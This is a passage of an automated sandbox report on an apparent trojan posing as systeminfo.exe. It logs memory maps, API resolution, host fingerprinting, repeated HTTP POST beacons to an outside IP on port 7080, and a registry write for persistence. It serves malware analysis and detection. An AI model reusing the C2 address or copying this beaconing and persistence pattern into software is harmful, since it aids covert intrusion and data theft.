uxtheme.dll	0x73480000	0x734fffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x73640000	0x73690fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x736a0000	0x736d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msacm32.dll	0x736e0000	0x736f3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x73700000	0x73707fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
fwpuclnt.dll	0x74500000	0x74537fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wship6.dll	0x74540000	0x74545fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshtcpip.dll	0x74550000	0x74554fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winrnr.dll	0x74560000	0x74567fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mswsock.dll	0x74570000	0x745abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pnrpnsp.dll	0x745b0000	0x745c1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
napinsp.dll	0x745d0000	0x745dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
npmproxy.dll	0x745e0000	0x745e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x745f0000	0x745fdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netprofm.dll	0x74600000	0x74659fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasadhlp.dll	0x74660000	0x74665fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nlaapi.dll	0x74670000	0x7467ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sensapi.dll	0x74680000	0x74685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rtutils.dll	0x74690000	0x7469cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasman.dll	0x746a0000	0x746b4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasapi32.dll	0x746c0000	0x74711fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x74720000	0x74726fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x74730000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x74750000	0x74793fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x747a0000	0x747c0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x747d0000	0x7496dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74970000	0x749aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x749b0000	0x749c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x749e0000	0x749ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x749f0000	0x749fafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74a00000	0x74a16fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74b20000	0x74b2bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74b30000	0x74b8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x74b90000	0x74be6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
normaliz.dll	0x74c20000	0x74c22fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x74d00000	0x74d82fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x74d90000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x74e30000	0x74f3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x74f40000	0x74f84fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x74f90000	0x7502cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75030000	0x75039fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75040000	0x7513ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75140000	0x7519ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x751c0000	0x7531bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75320000	0x75f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75f70000	0x7605ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76060000	0x7606bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x760f0000	0x761e4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76250000	0x7636cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76370000	0x7643bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76440000	0x764cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x764d0000	0x7655ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76700000	0x76745fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76750000	0x76885fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x76890000	0x76a8afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76ac0000	0x76af4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76b00000	0x76babfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76bb0000	0x76bc8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076bd0000	0x76bd0000	0x76cc9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076cd0000	0x76cd0000	0x76deefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76df0000	0x76f98fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x76fa0000	0x76fa5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76fd0000	0x7714ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions
For performance reasons, the remaining 6 entries are omitted. The remaining entries can be found in flog.txt.

Threads

Thread 0x7a0

(Host: 70, Network: 0)

Category	Operation	Information	Count	Logfile
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:49 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 21902	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:49 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 21918	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:49 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 21918	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:49 (Local Time)	1	Fn
System	Get Time	type = Ticks, time = 21918	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:49 (Local Time)	1	Fn
System	Sleep	duration = 0 milliseconds (0.000 seconds)	1	Fn
Mutex	Open	mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE	1	Fn
System	Get Time	type = Local Time, time = 2017-11-28 18:19:49 (Local Time)	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x20fa6c	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x20faa4	1	Fn
Module	Get Address	function = LoadLibraryA, ordinal = 0, address_out = 0x20fb14	1	Fn
Module	Get Address	function = UnmapViewOfFile, ordinal = 0, address_out = 0x20fb14	1	Fn
Module	Get Address	function = GetProcAddress, ordinal = 0, address_out = 0x20fb14	1	Fn
Module	Get Address	function = VirtualAlloc, ordinal = 0, address_out = 0x20fb14	1	Fn
Module	Get Address	function = VirtualProtect, ordinal = 0, address_out = 0x20fb14	1	Fn
Module	Get Address	function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14	1	Fn
Module	Get Address	function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x20fb14	1	Fn
Module	Load	module_name = msvcrt.dll, base_address = 0x76b00000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = strchr, address_out = 0x76b0dbeb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = free, address_out = 0x76b09894	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\msvcrt.dll, function = malloc, address_out = 0x76b09cee	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x74e30000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74ee6aa8	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74e41700	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x74e6828e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x74e44435	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x74e45929	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x74e63102	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x74e454ee	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x74e44442	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74e41245	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x74e414b1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x74e5b6e0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameExA, address_out = 0x74ec42ef	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74e45a4b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74e5eceb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74e411c0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74e414e9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x76ffe026	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74e414c9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74e411a9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74e41809	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74e411f8	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x75040000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7506ae5f	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x74d90000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x74dba4b4	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
System	Get Computer Name	result_out = YKyd69q, type = ComputerNameDnsHostname	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, type = size	1	Fn
Module	Unmap	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	1	Fn
System	Get Computer Name	result_out = YKYD69Q	1	Fn
Mutex	Create	mutex_name = Global\I705BA84C	1	Fn
Mutex	Create	mutex_name = Global\M705BA84C	1	Fn
Mutex	Release	mutex_name = Global\I705BA84C	1	Fn
System	Get Time	type = Ticks, time = 23790	1	Fn

Thread 0x318

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
System	Get Time	type = Ticks, time = 28875		1	Fn

Thread 0x760

(Host: 32, Network: 59)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 29796	1	Fn
System	Get Time	type = Ticks, time = 30794	1	Fn
System	Get Time	type = Ticks, time = 31793	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 33789	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 34803	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 35802	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 36800	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 39795	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn

Thread 0x794

(Host: 3, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 32791	1	Fn
System	Get Time	type = Ticks, time = 37799	1	Fn
System	Get Time	type = Ticks, time = 38797	1	Fn